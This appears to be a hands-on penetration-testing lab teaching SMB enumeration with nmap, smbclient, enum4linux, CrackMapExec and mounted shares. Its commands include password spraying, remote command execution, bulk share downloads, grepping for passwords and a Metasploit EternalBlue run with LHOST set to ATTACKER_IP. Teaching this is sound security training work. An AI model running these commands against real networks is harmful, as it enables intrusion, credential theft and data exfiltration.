๐ŸŽฏ Lab Objectives

  • Understand what SMB is and why it's a prime target
  • List available SMB shares without credentials (null session)
  • Enumerate users, groups, and domain info with enum4linux
  • Use CrackMapExec for rapid SMB reconnaissance
  • Check for EternalBlue (MS17-010) vulnerability
๐Ÿ‘ถ
SMB (Server Message Block) is the protocol Windows uses to share files, printers, and services over a network. It runs on port 445. Many Windows misconfigurations expose sensitive information with no credentials needed.

Step 1 โ€” What is SMB?

# SMB ports:
# 139/tcp  โ†’ NetBIOS session (older SMB)
# 445/tcp  โ†’ SMB over TCP (modern, most common)
# 137/udp  โ†’ NetBIOS name service
# 138/udp  โ†’ NetBIOS datagram

# SMB versions:
# SMBv1 โ†’ very old, has EternalBlue vulnerability (NEVER use in production)
# SMBv2 โ†’ Windows Vista+, much improved
# SMBv3 โ†’ Windows 8+, encryption support

# What you can find on SMB:
# - Shared folders (files, backups, configs, credentials)
# - Usernames and group names
# - Domain information
# - Password policies

Step 2 โ€” Port Scanning

# Quick check if SMB is open
nmap -p 139,445 192.168.1.0/24

# Detailed SMB scan
nmap -p 445 --script smb-security-mode 192.168.1.10

# Check OS and SMB version
nmap -p 445 --script smb-os-discovery 192.168.1.10

Step 3 โ€” smbclient

# List shares (null session โ€” no credentials)
smbclient -L //192.168.1.10 -N

# List shares with credentials
smbclient -L //192.168.1.10 -U username

# Connect to a specific share
smbclient //192.168.1.10/SHARE_NAME -N

# Inside smbclient โ€” common commands:
ls                   โ†’ list files
get filename         โ†’ download file
put localfile        โ†’ upload file
mget *.txt           โ†’ download all .txt files
cd directory         โ†’ change directory
pwd                  โ†’ show current path
exit                 โ†’ quit

# Recursively download everything from a share
smbclient //192.168.1.10/SHARE -N -c "recurse; prompt; mget *"

Step 4 โ€” enum4linux

# Full enumeration (users, shares, groups, policies)
enum4linux -a 192.168.1.10

# Specific flags:
-U โ†’ users
-S โ†’ shares
-G โ†’ groups
-P โ†’ password policy
-r โ†’ SID enumeration
-n โ†’ NetBIOS info
-a โ†’ all of the above

# enum4linux-ng (modern rewrite, better output)
sudo apt install enum4linux-ng -y
enum4linux-ng -A 192.168.1.10

# What you're looking for in the output:
# [+] Got domain/workgroup name: WORKGROUP
# [+] Enumerating users: Administrator, Guest, john, jane
# [+] Share: IPC$, C$, Users, Backups
# [+] Password policy: min length 0 (weak!)

Step 5 โ€” CrackMapExec

# Install
sudo apt install crackmapexec -y

# Enumerate a host
crackmapexec smb 192.168.1.10

# Enumerate shares (null)
crackmapexec smb 192.168.1.10 --shares

# Enumerate with credentials
crackmapexec smb 192.168.1.10 -u admin -p password --shares

# Enumerate users
crackmapexec smb 192.168.1.10 -u admin -p password --users

# Spray a password across multiple hosts
crackmapexec smb 192.168.1.0/24 -u admin -p Password123

# Test a list of credentials
crackmapexec smb 192.168.1.10 -u users.txt -p passwords.txt

# Execute a command (if you have creds)
crackmapexec smb 192.168.1.10 -u admin -p password -x "whoami"

Step 6 โ€” Nmap SMB Scripts

# Run all SMB scripts
nmap -p 445 --script "smb-*" 192.168.1.10

# Enumerate shares
nmap -p 445 --script smb-enum-shares 192.168.1.10

# Enumerate users
nmap -p 445 --script smb-enum-users 192.168.1.10

# Check for vulnerabilities
nmap -p 445 --script smb-vuln* 192.168.1.10

Step 7 โ€” EternalBlue (MS17-010) Check

# Check if vulnerable to EternalBlue (SMBv1 exploit used by WannaCry)
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10

# Output if vulnerable:
# VULNERABLE:
# Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
# State: VULNERABLE

# Exploit with Metasploit (on authorised systems ONLY)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST ATTACKER_IP
run

Step 8 โ€” Mounting SMB Shares

# Mount a share locally (easier to browse than smbclient)
sudo mkdir /mnt/smb
sudo mount -t cifs //192.168.1.10/Share /mnt/smb -o username=guest,password=

# With credentials
sudo mount -t cifs //192.168.1.10/Share /mnt/smb -o username=admin,password=Password123

# Browse and search for interesting files
find /mnt/smb -name "*.txt" -o -name "*.config" -o -name "*.xml" 2>/dev/null
grep -r "password" /mnt/smb/ 2>/dev/null

# Unmount
sudo umount /mnt/smb

๐Ÿ“‹ SMB Cheat Sheet

TaskCommand
List shares (null)smbclient -L //IP -N
Connect to sharesmbclient //IP/SHARE -N
Full enumenum4linux -a IP
CME reconcrackmapexec smb IP --shares
EternalBlue checknmap -p445 --script smb-vuln-ms17-010 IP
Mount sharemount -t cifs //IP/Share /mnt/smb -o username=,password=
โœ…
Lab Complete! SMB is one of the most exploited services in internal network penetration tests. Always enumerate it thoroughly โ€” anonymous shares containing passwords are extremely common.
Next: Active Directory โ†’ โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands